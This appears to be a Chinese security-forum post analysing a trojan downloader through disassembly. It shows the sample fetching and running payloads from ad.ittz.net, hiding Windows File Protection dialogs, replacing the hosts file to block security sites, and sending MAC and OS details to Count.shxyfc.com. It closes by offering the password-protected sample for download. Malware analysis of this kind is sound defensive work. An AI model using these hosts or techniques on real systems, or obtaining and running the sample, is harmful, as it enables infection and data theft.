00401483 |. 50 |push eax ; /Buffer
00401484 |. 68 04010000 |push 104 ; |BufSize = 104 (260.)
00401489 |. FF15 24044000 |call dword ptr [<&KERNEL32.GetTempPathA>] ; \GetTempPathA
0040148F |. 8D85 2CFEFFFF |lea eax, [local.117]
00401495 |. 50 |push eax ; /TempName
00401496 |. 53 |push ebx ; |Unique
00401497 |. 8D85 2CFEFFFF |lea eax, [local.117] ; |
0040149D |. 68 70074000 |push 00400770 ; |Prefix = "open"
004014A2 |. 50 |push eax ; |Path = "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\"
004014A3 |. FF15 20044000 |call dword ptr [<&KERNEL32.GetTempFileNameA>; \GetTempFileNameA
004014A9 |> 8D85 2CFEFFFF |/lea eax, [local.117]
004014AF |. 50 ||push eax
004014B0 |. 8D85 9CFBFFFF ||lea eax, [local.281] ; 0012F830 0012FDD0 ASCII "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\ope153.tmp"
004014B6 |. 50 ||push eax ; 0012F82C 0012FB40 ASCII "http://ad.ittz.net:72/ad.txt"
004014B7 |. E8 6BF8FFFF ||call <下载文件>
004014BC |. 59 ||pop ecx
004014BD |. 83F8 01 ||cmp eax, 1
004014C0 |. 59 ||pop ecx
004014C1 |. 74 0D ||je short 004014D0
004014C3 |. 68 88130000 ||push 1388 ; /Timeout = 5000. ms
004014C8 |. FF15 80044000 ||call dword ptr [<&KERNEL32.Sleep>] ; \Sleep
......下面还有一个线程,
00401549 |> \8D4D C0 ||lea ecx, [local.16]
0040154C |. 51 ||push ecx
0040154D |. 53 ||push ebx
0040154E |. 50 ||push eax
0040154F |. 68 5C164000 ||push 0040165C 线程 5
00401554 |. 53 ||push ebx
00401555 |. 53 ||push ebx
00401556 |. FFD6 ||call esi ; kernel32.CreateThread
00401558 |. 68 C0D40100 ||push 1D4C0 ; /Timeout = 120000. ms
0040155D |. 50 ||push eax ; |hObject
0040155E |. FF15 48044000 ||call dword ptr [<&KERNEL32.WaitForSingleOb>; \WaitForSingleObject
线程 5主要作用下载ad.txt列表里面的病毒木马运行
线程1 隐藏窗口
00400EF1 . 56 push esi
00400EF2 > 68 C0074000 push 004007C0 ; /Title = "Windows 文件保护"
00400EF7 . 68 B8074000 push 004007B8 ; |Class = "#32770"
00400EFC . FF15 3C054000 call dword ptr [<&USER32.FindWindowA>] ; \FindWindowA
00400F02 . 8BF0 mov esi, eax ; 创建线程,循环查找名为"#32770"的窗口
00400F04 . 85F6 test esi, esi
00400F06 . 74 27 je short 00400F2F
00400F08 . 6A F0 push -10 ; /Index = GWL_STYLE
00400F0A . 56 push esi ; |hWnd
00400F0B . FF15 38054000 call dword ptr [<&USER32.GetWindowLongA>] ; \GetWindowLongA
00400F11 . 0D 00000010 or eax, 10000000
00400F16 . 75 17 jnz short 00400F2F
00400F18 . 6A 00 push 0
00400F1A . 68 A4074000 push 004007A4
00400F1F . E8 BDFBFFFF call 00400AE1
00400F24 . 59 pop ecx
00400F25 . 59 pop ecx
00400F26 . 6A 00 push 0 ; /ShowState = SW_HIDE
00400F28 . 56 push esi ; |hWnd
00400F29 . FF15 44054000 call dword ptr [<&USER32.ShowWindow>] ; \ShowWindow
00400F2F > 6A 32 push 32 ; /Timeout = 50. ms
00400F31 . FF15 80044000 call dword ptr [<&KERNEL32.Sleep>] ; \Sleep
00400F37 .^ EB B9 jmp short 00400EF2
线程2
004011FC |. 68 CC054000 push 004005CC ; /src = "http://ad.ittz.net:72/hosts.txt"
00401201 |. 50 push eax ; |dest
00401202 |. E8 610F0000 call <jmp.&MSVCRT.strcpy> ; \strcpy
00401207 |. 83C4 20 add esp, 20
0040120A |. 8D85 ECFDFFFF lea eax, [local.133]
00401210 |. 68 1C084000 push 0040081C ; /String2 = "http://host"
00401215 |. 50 push eax ; |String1
00401216 |. FF15 58044000 call dword ptr [<&KERNEL32.lstrcmpiA>] ; \lstrcmpiA
0040121C |. 85C0 test eax, eax
0040121E |. 74 43 je short 00401263
00401220 |. 8D85 ECFEFFFF lea eax, [local.69]
00401226 |. 56 push esi ; /BufSize
00401227 |. 50 push eax ; |Buffer
00401228 |. FF15 1C044000 call dword ptr [<&KERNEL32.GetSystemDirector>; \GetSystemDirectoryA
0040122E |. 8D45 EC lea eax, [local.5]
00401231 |. 50 push eax ; /src
00401232 |. 8D85 ECFEFFFF lea eax, [local.69] ; |
00401238 |. 50 push eax ; |dest
00401239 |. E8 620F0000 call <jmp.&MSVCRT.strcat> ; \strcat
0040123E |. 8D85 ECFEFFFF lea eax, [local.69]
00401244 |. 50 push eax
00401245 |. 8D85 ECFDFFFF lea eax, [local.133]
0040124B |. 50 push eax ; "http://ad.ittz.**net:72/hosts.txt"
0040124C |. E8 D6FAFFFF call <下载文件> ; 从指定网址下载文档替换%SystemRoot%\system32\drivers\etc\hosts文件,用以屏蔽大量安全软件网址
00401251 |. 83C4 10 add esp, 10
00401254 |. 8D85 ECFEFFFF lea eax, [local.69]
0040125A |. 6A 01 push 1 ; /FileAttributes = READONLY
0040125C |. 50 push eax ; |FileName
0040125D |. FF15 5C044000 call dword ptr [<&KERNEL32.SetFileAttributes>; \SetFileAttributesA
00401263 |> 33C0 xor eax, eax
00401265 |. 5E pop esi
00401266 |. C9 leave
00401267 \. C3 retn
线程3 连接指定网站,并将用户系统版本网卡MAC地址等信息发送到该网站数据库中。
00400FFF /. 55 push ebp ;
00401000 |. 8BEC mov ebp, esp
00401002 |. 81EC 10030000 sub esp, 310
00401008 |. 53 push ebx
00401009 |. 56 push esi
0040100A |. BE FF000000 mov esi, 0FF
0040100F |. 33DB xor ebx, ebx
00401011 |. 56 push esi ; /n => FF (255.)
00401012 |. 8D85 F0FDFFFF lea eax, [local.132] ; |
00401018 |. 53 push ebx ; |c => 00
00401019 |. 50 push eax ; |s
0040101A |. E8 43110000 call <jmp.&MSVCRT.memset> ; \memset
0040101F |. 56 push esi ; /n
00401020 |. 8D85 F0FCFFFF lea eax, [local.196] ; |
00401026 |. 53 push ebx ; |c
00401027 |. 50 push eax ; |s
00401028 |. E8 35110000 call <jmp.&MSVCRT.memset> ; \memset
0040102D |. 8D85 F0FDFFFF lea eax, [local.132]
00401033 |. 68 26064000 push 00400626 ; /src = "http://Count.shxyfc.com:88/Count.asp"
00401038 |. 50 push eax ; |dest
00401039 |. E8 2A110000 call <jmp.&MSVCRT.strcpy> ; \strcpy
0040103E |. 83C4 20 add esp, 20
00401041 |. 8D85 F0FDFFFF lea eax, [local.132]
00401047 |. 68 0C084000 push 0040080C ; /String2 = "http://count"
0040104C |. 50 push eax ; |String1
0040104D |. FF15 58044000 call dword ptr [<&KERNEL32.lstrcmpiA>] ; \lstrcmpiA
00401053 |. 85C0 test eax, eax
00401055 |. 0F84 1C010000 je 00401177
0040105B |. E8 AEFDFFFF call 00400E0E
00401060 |. 8D85 F0FCFFFF lea eax, [local.196]
00401066 |. 68 A4064000 push 004006A4 ; /src = "730070000000"
0040106B |. 50 push eax ; |dest
0040106C |. E8 F7100000 call <jmp.&MSVCRT.strcpy> ; \strcpy
00401071 |. 59 pop ecx
00401072 |. 59 pop ecx
00401073 |. 53 push ebx
00401074 |. 53 push ebx
00401075 |. 53 push ebx
00401076 |. 53 push ebx
00401077 |. 68 04084000 push 00400804 ; ASCII "baidu"
0040107C |. FF15 30234000 call dword ptr [402330] ; ope14F.InternetOpenA
00401082 |. 3BC3 cmp eax, ebx
00401084 |. 8945 FC mov [local.1], eax
00401087 |. 0F84 EA000000 je 00401177
0040108D |. 57 push edi
0040108E |. 6A 40 push 40
00401090 |. 59 pop ecx
00401091 |. 33C0 xor eax, eax
00401093 |. 8DBD F1FEFFFF lea edi, dword ptr [ebp-10F]
00401099 |. 889D F0FEFFFF mov byte ptr [ebp-110], bl
0040109F |. F3:AB rep stos dword ptr es:[edi]
004010A1 |. 66:AB stos word ptr es:[edi]
004010A3 |. AA stos byte ptr es:[edi]
004010A4 |. BE FC074000 mov esi, 004007FC ; ASCII "?mac="
004010A9 |. 8D7D F4 lea edi, [local.3]
004010AC |. 8D85 F0FDFFFF lea eax, [local.132]
004010B2 |. A5 movs dword ptr es:[edi], dword ptr [esi]
004010B3 |. 50 push eax ; /src
004010B4 |. 8D85 F0FEFFFF lea eax, [local.68] ; |
004010BA |. 50 push eax ; |dest
004010BB |. 66:A5 movs word ptr es:[edi], word ptr [esi] ; |
004010BD |. E8 A6100000 call <jmp.&MSVCRT.strcpy> ; \strcpy
004010C2 |. 8D45 F4 lea eax, [local.3]
004010C5 |. 50 push eax ; //src = "?mac="
004010C6 |. 8D85 F0FEFFFF lea eax, [local.68] ; |
004010CC |. 50 push eax ; |dest
004010CD |. E8 CE100000 call <jmp.&MSVCRT.strcat> ; \strcat
004010D2 |. 8D85 F0FCFFFF lea eax, [local.196]
004010D8 |. 50 push eax ; /src
004010D9 |. 8D85 F0FEFFFF lea eax, [local.68] ; |
004010DF |. 50 push eax ; |dest
004010E0 |. E8 BB100000 call <jmp.&MSVCRT.strcat> ; \strcat
004010E5 |. 8D85 F0FEFFFF lea eax, [local.68]
004010EB |. 68 F4074000 push 004007F4 ; /src = "&ver="
004010F0 |. 50 push eax ; |dest
004010F1 |. E8 AA100000 call <jmp.&MSVCRT.strcat> ; \strcat
004010F6 |. 8D85 F0FEFFFF lea eax, [local.68]
004010FC |. 68 80064000 push 00400680 ; /src = "FM01|2011-08-25"
00401101 |. 50 push eax ; |dest
00401102 |. E8 99100000 call <jmp.&MSVCRT.strcat> ; \strcat
00401107 |. 8D85 F0FEFFFF lea eax, [local.68]
0040110D |. 68 EC074000 push 004007EC ; /src = "&os="
00401112 |. 50 push eax ; |dest
00401113 |. E8 88100000 call <jmp.&MSVCRT.strcat> ; \strcat
00401118 |. E8 A5FEFFFF call 00400FC2 ; \GetVersionExA
0040111D |. 50 push eax ; /src
0040111E |. 8D85 F0FEFFFF lea eax, [local.68] ; |
00401124 |. 50 push eax ; |dest
00401125 |. E8 76100000 call <jmp.&MSVCRT.strcat> ; \strcat
0040112A |. 8D85 F0FEFFFF lea eax, [local.68]
00401130 |. 68 E4074000 push 004007E4 ; /src = "&dtime="
00401135 |. 50 push eax ; |dest
00401136 |. E8 65100000 call <jmp.&MSVCRT.strcat> ; \strcat
0040113B |. 83C4 40 add esp, 40
0040113E |. 8D85 F0FEFFFF lea eax, [local.68]
00401144 |. 68 94064000 push 00400694 ; /src = "2011-8-2"
00401149 |. 50 push eax ; |dest
0040114A |. E8 51100000 call <jmp.&MSVCRT.strcat> ; \strcat
0040114F |. 59 pop ecx
00401150 |. 8D85 F0FEFFFF lea eax, [local.68]
00401156 |. 59 pop ecx
00401157 |. 53 push ebx
00401158 |. 68 00000080 push 80000000
0040115D |. 53 push ebx
0040115E |. 53 push ebx
0040115F |. 50 push eax
00401160 |. FF75 FC push [local.1] ; 01D6FC84 01D6FEA4 ASCII "http://Count.shxyfc.com:88/Count.asp?mac=730070000000&ver=FM01|2011-08-25&os=&dtime=2011-8-2"
00401163 |. FF15 44234000 call dword ptr [402344] ; ope14F.InternetOpenUrlA 发送信息了
00401169 |. 85C0 test eax, eax
0040116B |. 5F pop edi
0040116C |. 75 09 jnz short 00401177
0040116E |. FF75 FC push [local.1]
00401171 |. FF15 48234000 call dword ptr [402348] ; ope14F.InternetCloseHandle
00401177 |> 5E pop esi
00401178 |. 33C0 xor eax, eax
0040117A |. 5B pop ebx
0040117B |. C9 leave
0040117C \. C3 retn
驱动文件参考这个帖子 http://bbs.pediy.com/showthread.php?t=90248
.text:00012178
.text:00012178 loc_12178: ; CODE XREF: start+32j
.text:00012178 mov DestinationString.MaximumLength, bx
.text:0001217F mov DestinationString.Length, bx
.text:00012186
.text:00012186 loc_12186: ; CODE XREF: start+40j
.text:00012186 mov esi, [ebp+DriverObject]
.text:00012189 mov edi, ds:RtlInitUnicodeString
.text:0001218F mov eax, offset sub_104CC
.text:00012194 mov [esi+38h], eax
.text:00012197 mov [esi+40h], eax
.text:0001219A push offset SourceString ; SourceString
.text:0001219F lea eax, [ebp+DestinationString]
.text:000121A2 push eax ; DestinationString
.text:000121A3 mov dword ptr [esi+70h], offset sub_11C60
.text:000121AA call edi ; RtlInitUnicodeString
.text:000121AC lea eax, [ebp+DeviceObject]
.text:000121AF push eax ; DeviceObject
.text:000121B0 push ebx ; Exclusive
.text:000121B1 push 100h ; DeviceCharacteristics
.text:000121B6 push 22h ; DeviceType
.text:000121B8 lea eax, [ebp+DestinationString]
.text:000121BB push eax ; DeviceName
.text:000121BC push 208h ; DeviceExtensionSize
.text:000121C1 push esi ; DriverObject
.text:000121C2 call ds:IoCreateDevice
.text:000121C8 mov esi, eax
.text:000121CA cmp esi, ebx
.text:000121CC jl short loc_121F6
.text:000121CE push offset word_1210E ; SourceString
.text:000121D3 lea eax, [ebp+SymbolicLinkName]
.text:000121D6 push eax ; DestinationString
.text:000121D7 call edi ; RtlInitUnicodeString
.text:000121D9 lea eax, [ebp+DestinationString]
.text:000121DC push eax ; DeviceName
.text:000121DD lea eax, [ebp+SymbolicLinkName]
.text:000121E0 push eax ; SymbolicLinkName
.text:000121E1 call ds:IoCreateSymbolicLink
.text:000121E7 mov esi, eax
.text:000121E9 cmp esi, ebx
.text:000121EB jge short loc_12209
.text:000121ED push [ebp+DeviceObject] ; DeviceObject
.text:000121F0 call ds:IoDeleteDevice
.text:000121F6
.text:000121F6 loc_121F6: ; CODE XREF: start+96j
.text:000121F6 mov eax, DestinationString.Buffer
.text:000121FB cmp eax, ebx
.text:000121FD jz short loc_12242
.text:000121FF push ebx ; Tag
.text:00012200 push eax ; P
.text:00012201 call ds:ExFreePoolWithTag
.text:00012207 jmp short loc_12242
大体流程分析了完了,有兴趣的同学可以下载了分析。
解压密码virus
[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入!
赞赏
他的文章
- [原创]找了一个有样本的木马下载者分析 2236
- [原创][原创]工作中分析木马的一些心得 2500
- [原创]一个下载着分析 2738
- [原创]一个木马分析,请大家多多指教,提高分析 7246
赞赏
雪币:
留言:
